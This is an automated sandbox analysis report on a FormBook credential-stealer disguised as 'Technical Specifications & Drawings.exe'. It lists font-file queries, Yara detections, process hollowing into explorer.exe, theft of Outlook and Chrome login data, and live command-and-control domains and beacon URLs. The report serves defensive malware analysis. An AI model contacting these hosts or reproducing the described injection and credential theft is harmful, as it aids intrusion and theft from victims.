Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected FormBook
Source: Yara match File source: 4.0.Technical Specifications & Drawings.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Technical Specifications & Drawings.exe.39fd758.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000013.00000002.508193652.00000000024C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.314845901.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.513252120.0000000004260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.510569655.0000000002A30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.260249710.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.333361957.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.265706280.00000000039FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\SysWOW64\control.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\SysWOW64\control.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior

Remote Access Functionality
barindex
Yara detected FormBook
Source: Yara match File source: 4.0.Technical Specifications & Drawings.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Technical Specifications & Drawings.exe.39fd758.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000013.00000002.508193652.00000000024C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.314845901.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.513252120.0000000004260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.510569655.0000000002A30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.260249710.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.333361957.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.265706280.00000000039FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 680337 Sample: Technical Specifications & ... Startdate: 08/08/2022 Architecture: WINDOWS Score: 100 31 www.fundycases.com 2->31 33 td-balancer-199-15-163-148.wixdns.net 2->33 35 3 other IPs or domains 2->35 39 Snort IDS alert for network traffic 2->39 41 Multi AV Scanner detection for domain / URL 2->41 43 Malicious sample detected (through community Yara rule) 2->43 45 8 other signatures 2->45 9 Technical Specifications & Drawings.exe 3 2->9         started        signatures3 process4 file5 23 Technical Specific... & Drawings.exe.log, ASCII 9->23 dropped 55 Injects a PE file into a foreign processes 9->55 13 Technical Specifications & Drawings.exe 9->13         started        signatures6 process7 signatures8 57 Modifies the context of a thread in another process (thread injection) 13->57 59 Maps a DLL or memory area into another process 13->59 61 Sample uses process hollowing technique 13->61 63 Queues an APC in another process (thread injection) 13->63 16 explorer.exe 13->16 injected process9 dnsIp10 25 www.esandcraic.com 67.223.117.72, 49809, 80 VIMRO-AS15189US United States 16->25 27 tomoptique.fr 109.234.162.62, 49780, 80 O2SWITCHFR France 16->27 29 8 other IPs or domains 16->29 37 System process connects to network (likely due to code injection or exploit) 16->37 20 control.exe 13 16->20         started        signatures11 process12 signatures13 47 Tries to steal Mail credentials (via file / registry access) 20->47 49 Tries to harvest and steal browser information (history, passwords, etc) 20->49 51 Deletes itself after installation 20->51 53 2 other signatures 20->53
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
109.234.162.62
 tomoptique.fr France
50474 O2SWITCHFR true
107.155.208.43
 www.kirchhoff-darryl.com United States
4686 BEKKOAMEBEKKOAMEINTERNETINCJP true
67.223.117.72
 www.esandcraic.com United States
15189 VIMRO-AS15189US true
184.168.107.80
 mexc-event-partner.site United States
26496 AS-26496-GO-DADDY-COM-LLCUS true
67.23.226.119
 boshi-eg.online United States
33182 DIMENOCUS true

Private

IP
192.168.2.1

Contacted Domains

Name IP Active
boshi-eg.online 67.23.226.119 true
tomoptique.fr 109.234.162.62 true
mexc-event-partner.site 184.168.107.80 true
www.kirchhoff-darryl.com 107.155.208.43 true
www.esandcraic.com 67.223.117.72 true
td-balancer-199-15-163-148.wixdns.net 199.15.163.148 true
www.mexc-event-partner.site unknown unknown
www.fundycases.com unknown unknown
www.gzkanglongkeji.com unknown unknown
www.boshi-eg.online unknown unknown
www.tomoptique.fr unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.kirchhoff-darryl.com/02pi/?ZL0=JO9pwDAFX0pE08ZhB6JsQfIKbq32cMNHUs94bAK91+KgqpPGSJqKC7J3zS0r1gze3M+2qFZl2NsX2aSbasAE+ZE0SL8u6zgnew==&wRtdp=ETVPg0_ true
  • Avira URL Cloud: malware
 unknown
http://www.tomoptique.fr/02pi/?ZL0=thvfohwi7xD8LUPTC+PvURbDlMdrWv6G+kdQz5W5EjaeNcjaAM/7YzWabXa+Emqnmxa+j2rvyn8aQKdomTvD7NHn7LH6m5q/aw==&wRtdp=ETVPg0_ true
  • Avira URL Cloud: malware
 unknown
http://www.mexc-event-partner.site/02pi/?ZL0=OtaEbXX4ObCoLhtF/lWLZX2dLDLBfFgcjwhWC5AcKk5LEysMwPLPLl+t4RfX0ATi8hGNnWUlfKNR4DoGgewcnJOxYMoo89i/Ow==&wRtdp=ETVPg0_ true
  • Avira URL Cloud: malware
 unknown
http://www.esandcraic.com/02pi/?ZL0=H3j/zDn1cik0H8aEc4JTyOZmy0u09IlpCgxUGgbrjIcqKZuTm1TQkyEN0mTnJzpMGdd8V9PF4iBs4MdYqflf8PDJEP40yO/f8Q==&wRtdp=ETVPg0_ true
  • Avira URL Cloud: malware
 unknown
http://www.mexc-event-partner.site/02pi/ true
  • Avira URL Cloud: malware
 unknown
www.tomoptique.fr/02pi/ true
  • Avira URL Cloud: malware
 low